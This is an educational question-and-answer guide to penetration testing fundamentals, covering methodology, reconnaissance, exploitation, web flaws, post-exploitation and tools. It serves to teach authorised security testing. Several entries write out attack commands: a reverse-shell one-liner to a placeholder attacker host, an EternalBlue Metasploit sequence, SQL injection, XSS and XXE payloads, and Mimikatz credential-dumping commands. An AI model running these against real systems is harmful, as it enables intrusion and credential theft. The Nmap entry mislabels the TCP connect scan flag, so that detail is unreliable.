Penetration Testing Fundamentals
1. What is penetration testing?
Penetration testing (pen testing) is an authorised, simulated cyberattack performed by security professionals to identify vulnerabilities in systems, networks, and applications before malicious actors can exploit them. Unlike vulnerability scanning (automated, non-exploitative), pen testing actively attempts to exploit vulnerabilities to demonstrate real-world risk and impact. It requires explicit written authorisation (Rules of Engagement). Pen testers use the same tools and techniques as attackers but operate ethically, within defined scope, and with the goal of improving the organisation's security posture through a detailed findings report with remediation recommendations.
2. What are the different types of penetration testing?
Black box testing: the tester has no prior knowledge of the target environment — simulates an external attacker. White box testing (crystal box): the tester has full information (source code, architecture diagrams, credentials) — thorough but doesn't simulate realistic attacker conditions. Grey box testing: partial information (network diagrams, user credentials but not source code) — balances realism with depth. External penetration testing targets internet-facing assets (web apps, APIs, VPNs). Internal penetration testing simulates a compromised insider or attacker who has gained initial access. Physical penetration testing tests physical security controls (tailgating, social engineering, badge cloning).
3. What are the phases of a penetration test?
The standard penetration testing methodology follows these phases: (1) Planning and Scoping — define objectives, scope, rules of engagement, legal authorisation, and timelines; (2) Reconnaissance — gather information about the target passively (OSINT) and actively; (3) Scanning and Enumeration — identify open ports, services, versions, and vulnerabilities; (4) Exploitation — attempt to exploit identified vulnerabilities to gain access; (5) Post-Exploitation — maintain access, escalate privileges, pivot to other systems, and exfiltrate data (within scope); (6) Reporting — document findings with severity ratings, evidence, and remediation guidance; (7) Remediation Verification — retest after fixes are applied.
4. What is the PTES (Penetration Testing Execution Standard)?
PTES (Penetration Testing Execution Standard) is a framework providing detailed guidance for conducting penetration tests. It covers seven phases: Pre-Engagement Interactions (scope, authorisation, rules of engagement), Intelligence Gathering (OSINT and active reconnaissance), Threat Modelling (prioritising attack vectors), Vulnerability Analysis (identifying vulnerabilities), Exploitation (attacking identified vulnerabilities), Post-Exploitation (maintaining access, pivoting, data exfiltration within scope), and Reporting. PTES provides technical guidelines for each phase, making it the most commonly referenced methodology alongside OWASP Testing Guide for web applications and OSSTMM for comprehensive security testing.
5. What is the difference between vulnerability assessment and penetration testing?
A vulnerability assessment is an automated or semi-automated process that identifies and lists known vulnerabilities in systems using scanning tools (Nessus, Qualys, OpenVAS). It does not attempt to exploit vulnerabilities — it produces a list of potential weaknesses with severity ratings (CVSS scores). A penetration test goes further: it manually exploits vulnerabilities to demonstrate real-world impact, chains multiple vulnerabilities together (e.g., low-severity XSS + CSRF → account takeover), and tests detective and preventive controls. Vulnerability assessments are faster and cheaper; penetration tests provide evidence of actual risk. Both are complementary — vulnerability assessments are often run more frequently.
6. What is the OWASP Top 10?
The OWASP Top 10 is a regularly updated list of the ten most critical web application security risks, maintained by the Open Web Application Security Project. The 2021 edition includes: Broken Access Control, Cryptographic Failures, Injection (SQL, NoSQL, OS commands), Insecure Design, Security Misconfiguration, Vulnerable and Outdated Components, Identification and Authentication Failures, Software and Data Integrity Failures, Security Logging and Monitoring Failures, and Server-Side Request Forgery (SSRF). The OWASP Top 10 is the starting checklist for every web application penetration test and the foundation of secure development training.
7. What is CVSS and how is it used?
CVSS (Common Vulnerability Scoring System) is a standardised framework for rating the severity of security vulnerabilities on a scale from 0.0 to 10.0. CVSS v3.1 considers: Base Score (inherent severity — attack vector, complexity, privileges required, user interaction, impact on CIA), Temporal Score (exploitability over time — exploit code availability, patch status), and Environmental Score (impact specific to the organisation's context). Severity levels: Critical (9.0-10.0), High (7.0-8.9), Medium (4.0-6.9), Low (0.1-3.9). Pen test reports use CVSS scores to prioritise remediation. The NVD (National Vulnerability Database) provides CVSS scores for publicly known CVEs.
8. What is a CVE?
A CVE (Common Vulnerabilities and Exposures) is a unique identifier for a publicly known security vulnerability in a specific software product or version. CVEs are assigned by CVE Numbering Authorities (CNAs) and published in the NVD. Format: CVE-YEAR-NUMBER (e.g., CVE-2021-44228, the Log4Shell vulnerability). Each CVE entry includes a description, affected versions, CVSS score, and references. Pen testers use CVE databases to find known exploits for identified software versions during vulnerability analysis. Tools like Metasploit and Exploit-DB are indexed by CVE. Organisations track their exposure to CVEs through vulnerability management programs.
9. What is the difference between active and passive reconnaissance?
Passive reconnaissance gathers information about the target without directly interacting with its systems, avoiding detection. Techniques include: WHOIS lookups (registrar information), DNS record lookups, Google dorking (Google search operators to find exposed files and data), Shodan (internet-connected device search), LinkedIn and social media profiling, Wayback Machine (historical website content), certificate transparency logs (subdomains), and job postings (technology stack clues). Active reconnaissance directly interacts with the target: port scanning, service detection, banner grabbing, DNS zone transfers, and web spidering. Active reconnaissance is more detectable and requires explicit authorisation.
10. What are the rules of engagement in a penetration test?
Rules of Engagement (RoE) are the contractual and operational boundaries agreed between the pen tester and the client before testing begins. They define: the scope (specific IP ranges, domains, applications — what is in and out of scope), testing windows (hours when testing can occur to avoid disrupting production), prohibited techniques (DoS attacks, social engineering unless explicitly authorised, modification of production data), emergency contacts (who to call if a critical vulnerability or active threat is discovered), data handling (how sensitive data discovered must be handled), and deliverables (report format, timeline). Testing outside the agreed scope is illegal regardless of authorisation for other systems.
Reconnaissance & Enumeration
11. What is OSINT and what tools are used?
OSINT (Open Source Intelligence) is the collection of publicly available information to understand a target before active testing. Pen testers use OSINT to map the attack surface, find employee names and email formats (for phishing), identify technology stack, discover subdomains, and find exposed credentials or sensitive data. Key tools: theHarvester (emails, subdomains, names from search engines), Maltego (visual link analysis and data aggregation), Shodan (internet-connected device search), WHOIS and nslookup (domain registration and DNS), Recon-ng (web reconnaissance framework), LinkedIn/Twitter for employee profiling, and OSINT Framework (directory of OSINT tools by category). Subdomain enumeration tools: Subfinder, Amass.
12. What is Nmap and what are its key scanning techniques?
Nmap (Network Mapper) is the de facto standard for port scanning, service detection, and OS fingerprinting. Key scan types: SYN scan (-sS) — sends SYN, receives SYN-ACK (open) or RST (closed), fast and stealthy (half-open, doesn't complete TCP handshake). TCP connect scan (-sC) — completes the three-way handshake, logged by the target. UDP scan (-sU) — slower, unreliable but needed for UDP services. Service version detection (-sV) — probes open ports to identify running services and versions. OS detection (-O). Script scanning (-sC) — runs default NSE (Nmap Scripting Engine) scripts. A full port scan: nmap -sS -p- -T4 -sV -O target.
13. What is enumeration and what information is gathered?
Enumeration is active extraction of detailed information from discovered services after port scanning. Targets include: users (valid usernames for brute force, password spray), groups and permissions, network shares (SMB enumeration), running services and versions, routing information, domain controllers and Active Directory structure (LDAP enumeration), email addresses, DNS records (zone transfers), web application directories and files (directory busting), and SNMP information. Tools: enum4linux/enum4linux-ng (Windows/Samba), nmblookup (NetBIOS), ldapsearch (LDAP/AD), snmpwalk (SNMP), gobuster/feroxbuster (web directories), wfuzz (web parameters). Thorough enumeration directly informs which exploits to attempt.
14. What is directory busting?
Directory busting (directory brute-forcing) discovers hidden or unlinked web directories and files by making HTTP requests for a large wordlist of common paths. URLs returning 200 OK, 301 Moved, or 403 Forbidden indicate existing resources. Tools: gobuster (gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt), feroxbuster (recursive, async), ffuf, dirsearch, and Burp Suite's content discovery. Common wordlists: SecLists (danielmiessler/SecLists), dirb's common.txt. Directory busting discovers admin panels, backup files, configuration files, API endpoints, and developer test pages — common sources of critical vulnerabilities.
15. What is DNS enumeration?
DNS enumeration extracts information about a target's domain infrastructure. Techniques include: nslookup/dig for A, MX, NS, TXT, and CNAME records; zone transfer attempts (dig axfr @dns-server domain.com) — if misconfigured, reveals all DNS records; subdomain enumeration using wordlists (Sublist3r, Amass, Subfinder) or certificate transparency logs (crt.sh); reverse DNS lookups (PTR records revealing server names); SPF, DKIM, DMARC record analysis (email security configuration); and DNS brute forcing. Subdomains reveal internal infrastructure (dev.company.com, vpn.company.com, jira.company.com), forgotten systems, and attack surface. DNS information is critical for mapping the full scope of internet-facing assets.
Exploitation Techniques
16. What is Metasploit?
Metasploit is the world's most widely used penetration testing framework, providing a modular platform for developing, testing, and executing exploits. Components: msfconsole (interactive CLI), exploits (attack code targeting specific vulnerabilities), payloads (code that runs after exploitation — Meterpreter, shell), auxiliary modules (scanners, fuzzers, DoS), and post-exploitation modules. Workflow: search ms17-010 → use exploit/windows/smb/ms17_010_eternalblue → set RHOSTS 192.168.1.1 → set PAYLOAD windows/x64/meterpreter/reverse_tcp → run. Meterpreter provides an advanced interactive shell with commands for privilege escalation, credential dumping, lateral movement, and pivoting. Metasploit requires explicit authorisation.
17. What is SQL injection and how do you test for it?
SQL injection exploits applications that include unsanitised user input in SQL queries. Test manually by injecting single quote ' to see if the application returns a database error. Boolean-based: ' OR '1'='1 tests if the application behaves differently. Time-based: ' OR SLEEP(5)-- confirms injection if the response is delayed. SQLmap automates SQL injection detection and exploitation: sqlmap -u "http://target/page?id=1" --dbs enumerates databases. SQLmap can extract tables, dump data, access the file system, and execute OS commands depending on database permissions. Blind SQL injection (no error messages) uses boolean conditions and time delays to extract data bit by bit.
18. What is Cross-Site Scripting (XSS) and how is it exploited?
XSS injects malicious JavaScript into web pages viewed by other users. Reflected XSS: the payload is in the URL and reflected in the response — test by injecting <script>alert(1)</script> in URL parameters or form fields. Stored XSS: the payload is stored in the database and executed whenever the page is loaded by any user — test comment fields, user profiles, and any persistent input. DOM-based XSS: payload is processed by client-side JavaScript — test URL fragments and JavaScript sink manipulation. Exploitation: cookie theft (document.cookie exfiltration), session hijacking, keylogging, credential phishing, and CSRF execution. Tools: Burp Suite Scanner, XSStrike, XSSHunter (for blind XSS).
19. What is Burp Suite and how is it used in web app pen testing?
Burp Suite is the industry-standard web application security testing platform. The Proxy intercepts HTTP/HTTPS traffic between the browser and server, allowing inspection and modification of every request and response. The Repeater manually resends modified requests for manual testing. Intruder automates request fuzzing (brute force, parameter tampering, injection testing) with customisable payload positions and wordlists. Scanner (Pro) automatically crawls and audits for OWASP vulnerabilities. The Decoder handles encoding/decoding (Base64, URL, HTML). The Collaborator detects out-of-band interactions (blind SSRF, XXE, blind SQL injection). Extensions (BApp Store): ActiveScan++, Autorize, JSON Beautifier.
20. What is a reverse shell and how does it work?
A reverse shell establishes a command-line connection from the target machine back to the attacker's machine, bypassing firewall rules that block inbound connections. The attacker starts a listener: nc -lvnp 4444. The attacker delivers a payload to the target (via web shell, exploit, phishing) that executes: bash -i >& /dev/tcp/attacker-ip/4444 0>&1. The target connects out to the attacker, providing interactive shell access. Reverse shells bypass NAT and most perimeter firewalls (which allow outbound traffic). A bind shell (less common) opens a port on the target that the attacker connects to — useful on hosts where outbound connections are filtered. Tools: netcat, socat, msfvenom payloads.
21. What is privilege escalation?
Privilege escalation is the process of gaining higher privileges after initial access to a system — moving from a low-privilege user to SYSTEM/root. Vertical escalation (the most common target) moves from standard user to administrator. Techniques on Linux: SUID/SGID binary exploitation (finding setuid binaries that can be abused), sudo misconfiguration (sudo -l reveals commands executable without password), cron jobs running as root with writable scripts, writable /etc/passwd, kernel exploits, PATH hijacking, and capabilities abuse. Techniques on Windows: unquoted service paths, weak service permissions, DLL hijacking, token impersonation (SeImpersonatePrivilege via Juicy/Sweet Potato), AlwaysInstallElevated, and UAC bypass.
22. What is lateral movement?
Lateral movement is the technique of progressively accessing additional systems within a network after gaining initial footing, building toward the target (domain controller, sensitive data). Techniques include: Pass-the-Hash (using captured NTLM hashes with pth-winexe or Mimikatz's sekurlsa module), Pass-the-Ticket (using stolen Kerberos tickets with Mimikatz's kerberos::ptt), remote execution via SMB (PsExec, wmiexec), PowerShell remoting, RDP with stolen credentials, using legitimate admin tools (Living off the Land), and exploiting trust relationships between systems. Tools: Impacket (Python suite for SMB/Kerberos attacks), CrackMapExec, BloodHound (maps Active Directory attack paths).
23. What is Mimikatz?
Mimikatz is a Windows credential extraction tool that can dump password hashes, plaintext credentials (from LSASS memory), Kerberos tickets, DPAPI secrets, and more. Commands: sekurlsa::logonpasswords dumps credentials from LSASS (requires SYSTEM or SeDebugPrivilege); lsadump::sam dumps the SAM database; kerberos::list lists Kerberos tickets; kerberos::golden creates a Golden Ticket (persistent domain persistence using the KRBTGT hash); sekurlsa::pth performs Pass-the-Hash attacks. Modern Windows defenses (Credential Guard, Protected Users group) mitigate Mimikatz. It is used in red team engagements after administrative access is achieved and is a primary reason why least-privilege and Credential Guard are critical defenses.
24. What is Active Directory attack techniques?
Active Directory (AD) attacks exploit the Windows domain controller authentication infrastructure. Key attacks: Kerberoasting — request service tickets (TGS) for SPN-registered accounts and crack them offline (hashcat, john) to extract service account passwords; AS-REP Roasting — exploit accounts with "Do not require Kerberos preauthentication" set; BloodHound/SharpHound — enumerate AD permissions and visualise attack paths to Domain Admin; DCSync — accounts with Replication Directory Changes permissions can dump all domain hashes without executing code on the DC; Pass-the-Hash/Pass-the-Ticket — reuse credentials without knowing plaintext; Golden Ticket — forge Kerberos tickets using the KRBTGT hash for persistent access.
25. What is pivoting and tunnelling?
Pivoting uses a compromised system as a stepping stone to access otherwise unreachable network segments. The compromised host acts as a proxy for the attacker. Techniques: SSH tunnelling (ssh -L local_port:internal_host:remote_port pivot_user@pivot_host), SOCKS proxy via Metasploit (use auxiliary/server/socks_proxy; route add ...), Chisel (fast TCP/UDP tunnelling over HTTP), and Ligolo-ng (reverse TUN tunnel). Tunnelling routes attacker traffic through legitimate protocols (DNS tunnelling via iodine, ICMP tunnelling via ptunnel) to bypass firewall rules. Pivoting enables testing of internal networks from an external foothold, as would occur in a real-world breach after initial compromise.
Web Application Testing
26. What is SSRF (Server-Side Request Forgery)?
SSRF tricks a server-side application into making HTTP requests to unintended destinations, including internal services (localhost, internal IPs) not accessible from the internet. Attackers can: access internal metadata APIs (AWS metadata at 169.254.169.254 — read IAM credentials), scan internal networks, access internal services (Redis, Elasticsearch, internal admin panels), and bypass access controls. Test by providing a server-side URL parameter pointing to a controlled server (Burp Collaborator) or internal addresses. Blind SSRF uses out-of-band detection. Mitigations: whitelist allowed URLs, disable unnecessary URL schemes (file://, gopher://), use cloud IMDS v2 (requiring PUT request), and implement network egress controls.
27. What is XML External Entity (XXE) injection?
XXE exploits applications that parse XML input with external entity processing enabled. An attacker defines an external entity that points to a sensitive file: <!ENTITY xxe SYSTEM "file:///etc/passwd"> and includes it in the XML payload. If the parser processes external entities, it reads the file and includes it in the response. XXE can read arbitrary files, perform SSRF (fetching internal URLs), cause DoS (Billion Laughs attack), and in some cases achieve RCE. Test by injecting external entity definitions in XML-accepting inputs. Mitigations: disable external entity processing in the XML parser (set FEATURE_EXTERNAL_GENERAL_ENTITIES to false), use less complex formats (JSON), and validate and sanitise XML input.
28. What is IDOR (Insecure Direct Object Reference)?
IDOR (now classified under Broken Access Control in OWASP Top 10) occurs when an application uses user-controllable input to directly access objects (database records, files, user data) without sufficient authorisation checks. Test by: changing URL parameters (/account?id=1234 → id=1235), modifying request body IDs, altering encoded values (Base64, hashed IDs), and testing all CRUD operations. Horizontal IDOR accesses other users' data at the same privilege level; vertical IDOR accesses functions requiring higher privilege. Mitigation: implement proper authorisation checks for every object access, use indirect references (GUIDs instead of sequential integers), and validate that the authenticated user is authorised to access the requested object.
29. What is CSRF (Cross-Site Request Forgery)?
CSRF tricks authenticated users into unknowingly submitting requests to a web application they are logged into. An attacker crafts a malicious webpage with a hidden form that submits to the target application (bank transfer, password change) — when the victim visits the attacker's page, the browser sends the request with the victim's session cookies. Test by: identifying state-changing requests without CSRF tokens, checking if CSRF tokens are validated, testing same-site cookie attributes. Mitigations: CSRF tokens (unique, unpredictable per-session tokens validated server-side), SameSite=Strict/Lax cookie attribute (most effective modern mitigation), double submit cookie pattern, and custom request headers for AJAX.
30. What is authentication testing?
Authentication testing evaluates the strength of login mechanisms. Tests include: username enumeration (does the application reveal whether a username exists via different error messages?), password policy enforcement, brute force protection (rate limiting, account lockout, CAPTCHA), default credentials (admin/admin, admin/password), credential stuffing (testing known breached credential lists), multi-factor authentication bypass (SIM swapping, OTP reuse, backup code exposure), password reset flaws (predictable tokens, token reuse, host header injection in reset emails), and session management (session fixation, predictable session IDs, missing Secure/HttpOnly cookie flags). Tools: Hydra, Medusa, Burp Suite Intruder.
Post-Exploitation & Reporting
31. What is persistence in post-exploitation?
Persistence mechanisms maintain access to a compromised system across reboots and user logouts. Windows techniques: adding registry run keys (HKCU/HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run), scheduled tasks, Windows services, startup folder, DLL hijacking, WMI event subscriptions, and Active Directory backdoors (skeleton key, Golden Ticket). Linux techniques: cron jobs, ~/.bashrc modification, SSH authorized_keys, setuid binary planting, init scripts, and systemd service units. Persistence is demonstrated during red team engagements to show the full impact of a compromise. In pen tests, actual persistence is typically not installed on production systems to avoid unintended consequences — it is documented as a demonstrated capability.
32. What is data exfiltration?
Data exfiltration demonstrates the attacker's ability to extract sensitive data from a compromised environment, completing the "kill chain." Techniques: HTTPS upload to attacker-controlled server, DNS exfiltration (encode data in DNS queries to a controlled nameserver — evades many data loss prevention systems), email (SMTP using compromised mail server), cloud storage uploads (S3, Dropbox, Google Drive), and covert channels (ICMP tunnelling, steganography). In pen tests, actual sensitive data is not exfiltrated — testers create synthetic "flag" files to demonstrate the capability without handling real data. The exfiltration path is documented in the report to highlight inadequate DLP and egress monitoring controls.
33. What is a red team engagement vs. a penetration test?
A penetration test is typically scoped, time-limited, and focused on finding as many vulnerabilities as possible in a defined target. The client's security team usually knows testing is occurring. A red team engagement simulates a full, realistic adversary campaign with a specific objective (e.g., access the finance database, steal CEO credentials). The blue team (defenders) does not know the engagement is happening — this tests detection and response capabilities, not just vulnerability existence. Red teams use OPSEC (operational security) to avoid detection, operate over weeks or months, use custom tools to evade EDR, and test the full kill chain from initial access to objective completion. Red team results measure organisational security maturity.
34. What are the components of a penetration test report?
A professional pen test report includes: Executive Summary (high-level overview of scope, methodology, key findings, and risk posture — written for non-technical senior management), Technical Findings (each vulnerability with: title, severity rating (CVSS score), affected systems, description, evidence (screenshots, logs, proof-of-concept code), risk and business impact, and specific remediation guidance), Methodology (testing approach, tools used, phases covered), Scope (what was tested and excluded), Attack Narrative (story of how the tester progressed through the kill chain — for red team engagements), and Appendices (raw scan output, tool versions, CVE references). Reports must be clear, evidence-backed, and actionable.
35. What is a proof of concept (PoC) in a pen test report?
A proof of concept (PoC) is evidence demonstrating that a vulnerability was successfully exploited, not just theoretically present. PoC elements include: screenshots showing exploitation (shell access, data retrieved, admin panel accessed), the exact command or request used (reproducible), the impact demonstrated (what was accessed), and where appropriate, a minimal code snippet showing the exploit. PoCs distinguish confirmed findings from speculative ones and give developers the exact information needed to reproduce and understand the vulnerability. Sensitive details (actual passwords, personal data) are redacted from PoCs. In critical severity findings, PoCs often show the complete exploit chain.
36. What is the OWASP Testing Guide?
The OWASP Testing Guide (OTG) is the most comprehensive methodology for web application penetration testing. Its latest version (v4.2) covers: Information Gathering (OTG-INFO), Configuration and Deployment Management Testing (OTG-CONFIG), Identity Management Testing (OTG-IDENT), Authentication Testing (OTG-AUTHN), Authorisation Testing (OTG-AUTHZ), Session Management Testing (OTG-SESS), Input Validation Testing (OTG-INPVAL), Error Handling, Cryptography Testing, Business Logic Testing, and Client-Side Testing. Each test case includes objectives, methodology, tools, and examples. The OWASP Testing Guide is the standard reference document that web application pen testers use to ensure comprehensive coverage.
37. What is subdomain takeover?
Subdomain takeover occurs when a subdomain (e.g., shop.company.com) is configured as a CNAME pointing to a third-party service (e.g., AWS S3, GitHub Pages, Heroku) that has been deprovisioned — the CNAME still exists but the target service is no longer claimed. An attacker registers the deprovisioned resource, gaining control of the subdomain. Impact: serve malicious content under the trusted domain, steal cookies set on the parent domain, phishing attacks from a legitimate-looking URL, and bypassing CSP. Test using: Subfinder (enumerate subdomains) + dig (check CNAME targets) + can-i-take-over-xyz (list of vulnerable services). Mitigation: remove stale DNS records immediately when deprovisioning services.
38. What is fuzzing in penetration testing?
Fuzzing (fuzz testing) sends malformed, unexpected, or random input to an application to discover bugs, crashes, and security vulnerabilities. In web app testing: Burp Suite Intruder or ffuf fuzzes HTTP parameters, headers, and body fields with wordlists to find injection points, hidden parameters, and input validation flaws. API fuzzing sends invalid types, boundary values, and special characters to API endpoints. Protocol fuzzing sends malformed packets to network services to discover memory corruption vulnerabilities. AFL (American Fuzzy Lop) and libFuzzer are coverage-guided fuzzers for binary applications. Fuzzing discovers vulnerabilities that manual testing and automated scanners miss, particularly in custom or proprietary software.
39. What is business logic testing?
Business logic testing identifies flaws in the application's intended workflow that allow unintended actions — vulnerabilities that scanners cannot detect because the requests appear valid. Examples: negative quantity in a purchase (credits money), skipping payment steps in a checkout flow, purchasing items at 0 price (price tampering in JavaScript), reusing gift cards or discount codes, bypassing rate limits by manipulating the request format, account enumeration through differential responses, and privilege escalation through parameter manipulation. Business logic flaws require understanding the intended application behaviour and testing deviations. They are often the most impactful findings in web app pen tests and require experienced testers who think like both users and attackers.
40. What is API penetration testing?
API penetration testing specifically tests RESTful, GraphQL, and SOAP APIs for security vulnerabilities. Common API-specific findings: Broken Object Level Authorisation (BOLA/IDOR — accessing other users' objects), Broken Function Level Authorisation (accessing admin endpoints), Mass Assignment (API accepts and binds unexpected properties to objects, e.g., isAdmin: true), Excessive Data Exposure (returning more fields than needed), Lack of Rate Limiting (brute force, enumeration), broken authentication (JWT algorithm confusion, weak secrets), and improper inventory management (forgotten API versions like /v1 that are less secured). Tools: Postman, Insomnia, Burp Suite, Arjun (hidden parameter discovery), graphql-cop (GraphQL security checks).
Tools & Advanced Techniques
41. What is social engineering in penetration testing?
Social engineering exploits human psychology rather than technical vulnerabilities. Pen test social engineering (requires explicit authorisation): phishing (crafting convincing emails with malicious links or attachments — GoPhish automates phishing campaigns), vishing (phone-based deception — pretending to be IT support to extract credentials), physical tailgating (following authorised personnel through access-controlled doors), pretexting (creating false scenarios — "I'm from IT, I need your password for system maintenance"), and baiting (leaving infected USB drives in car parks). Social engineering tests measure employee security awareness and the effectiveness of security training. Results inform phishing simulation programs and awareness training priorities.
42. What is Wireshark and how is it used in pen testing?
Wireshark is a network protocol analyser that captures and inspects network traffic in real-time. In pen testing: capturing credentials sent over unencrypted protocols (HTTP, FTP, Telnet, SMTP without TLS), analysing application protocols for vulnerabilities, identifying cleartext sensitive data, capturing authentication handshakes (NTLM, Kerberos) for offline cracking, analysing malware C2 traffic, verifying encryption is properly implemented, and troubleshooting connectivity issues during testing. Filter syntax: http, tcp.port == 443, ip.addr == 192.168.1.1, http contains "password". tcpdump is the CLI equivalent. Wireshark requires physical network access or a man-in-the-middle position to capture traffic.
43. What is password cracking and what tools are used?
Password cracking recovers plaintext passwords from captured hashes. Tools: Hashcat (GPU-accelerated — fastest for most hash types), John the Ripper (CPU-based, versatile). Attack modes: dictionary attack (try every word in a wordlist — rockyou.txt, SecLists), rule-based attack (apply transformation rules to a wordlist — append numbers, capitalise), brute force (try all character combinations), and combination attack (combine words from multiple wordlists). Common hash formats: NTLM (Windows), MD5, SHA1, bcrypt (slow — designed to resist cracking), PBKDF2, Kerberos TGS/TGT ($krb5...). Always obtain explicit authorisation before cracking passwords. Identified cracked passwords are reported (without plain text) to demonstrate weak password policy.
44. What is the difference between Nessus and OpenVAS?
Nessus (Tenable) is the most widely used commercial vulnerability scanner, known for accuracy, speed, and a comprehensive plugin library (150,000+ checks). Available as Nessus Essentials (free, 16 IPs), Nessus Professional (paid), and as the core engine of Tenable.sc. OpenVAS (Open Vulnerability Assessment System) is the primary open-source alternative, maintained by Greenbone Networks. It uses the GVM (Greenbone Vulnerability Management) framework and is available free as Greenbone Community Edition. Nessus generally has fewer false positives and more comprehensive coverage; OpenVAS is preferred when cost or open-source licensing is a requirement. Both integrate with pen test workflows for initial vulnerability identification.
45. What is Living off the Land (LotL)?
Living off the Land refers to using legitimate, pre-installed system tools and features for attack activity, rather than dropping custom malware. This evades anti-virus and EDR solutions that detect known malicious files. Windows LotL tools: PowerShell (download, execution), certutil (download files, decode Base64), bitsadmin (file transfer), mshta (execute HTA files), regsvr32 (execute remote scripts), wmic (lateral movement), and Task Scheduler. Linux LotL tools: bash, curl/wget, cron, ssh, Python/Perl (usually pre-installed). LOLBAS (Living Off The Land Binaries, Scripts, and Libraries) project catalogs all such tools. Detection requires behavioural analytics rather than signature-based defences.
46. What is an engagement scope document?
An engagement scope document (Statement of Work or Rules of Engagement document) formally defines the boundaries of a penetration test. It specifies: target IP ranges and FQDNs (explicitly listed in-scope systems), out-of-scope systems (production databases, third-party hosted services, specific critical servers), authorised testing techniques (network scanning, web app testing, social engineering, physical — each may require separate authorisation), excluded techniques (denial of service, data destruction, production database modification), testing windows (hours, start/end dates), emergency stop procedures, point of contact for authorisation questions, data handling requirements, and post-test deliverables. Never begin testing without a signed scope document.
47. What is exploit development?
Exploit development is the process of creating custom code to take advantage of a software vulnerability. Phases: vulnerability research (identify a software flaw through code review, fuzzing, or reverse engineering), understanding the vulnerability (memory layout, crash analysis), developing a proof of concept (triggering the crash reliably), controlling execution (overwriting the return address or function pointer), finding code gadgets (ROP chains for bypassing DEP/NX), bypassing ASLR (address space layout randomisation), writing the shellcode payload, and stabilising the exploit across versions. Tools: pwndbg/peda (GDB plugins), pwntools (Python exploit development library), radare2/Ghidra (reverse engineering). Exploit development is an advanced skill requiring deep understanding of memory, assembly, and operating system internals.
48. What is container security testing?
Container security testing evaluates Docker and Kubernetes environments for misconfigurations and vulnerabilities. Common findings: containers running as root (privilege escalation to host via exposed /proc), privileged containers (full kernel access), excessive capabilities, writable host path mounts (/var/run/docker.sock mounted — provides Docker daemon control), exposed container registries without authentication, unpatched base images with CVEs, secrets in environment variables or image layers, missing resource limits (CPU, memory), Kubernetes RBAC misconfigurations (overly permissive service accounts, default service account token mounting), and network policies not enforced. Tools: Trivy (image vulnerability scanning), kube-bench (CIS Kubernetes benchmarks), Falco (runtime security monitoring).
49. What is cloud penetration testing?
Cloud penetration testing assesses the security of cloud infrastructure (AWS, Azure, GCP). Key areas: IAM misconfiguration (overly permissive policies, unused access keys, roles assumable by any authenticated user), S3 bucket misconfigurations (public buckets with sensitive data), metadata service exploitation (SSRF to 169.254.169.254 for IAM role credentials), exposed services (EC2 instances with security groups allowing 0.0.0.0/0 to all ports), serverless function vulnerabilities, container misconfigurations (ECS task definitions with excessive permissions), storage account misconfigurations (Azure Blob public access), and API key exposure in code repositories. Tools: Pacu (AWS exploitation framework), ScoutSuite (multi-cloud auditing), CloudSploit, Prowler.
50. How do you stay current with new vulnerabilities and exploits?
Staying current in penetration testing requires continuous learning: following CVE and NVD feeds (new vulnerability disclosures), reading security research blogs (Project Zero, NCC Group, OffSec, Portswigger Web Security Blog), monitoring Twitter/X security community, following exploit databases (Exploit-DB, PacketStorm), practising on CTF platforms (HackTheBox, TryHackMe, PentesterLab), studying penetration test reports (many companies publish sanitised red team reports), reading offensive security research papers, participating in bug bounty programs (HackerOne, Bugcrowd), and taking certifications (OSCP — Offensive Security Certified Professional is the gold standard, CEH, eJPT, BSCP for web). The field evolves rapidly — continuous hands-on practice is essential.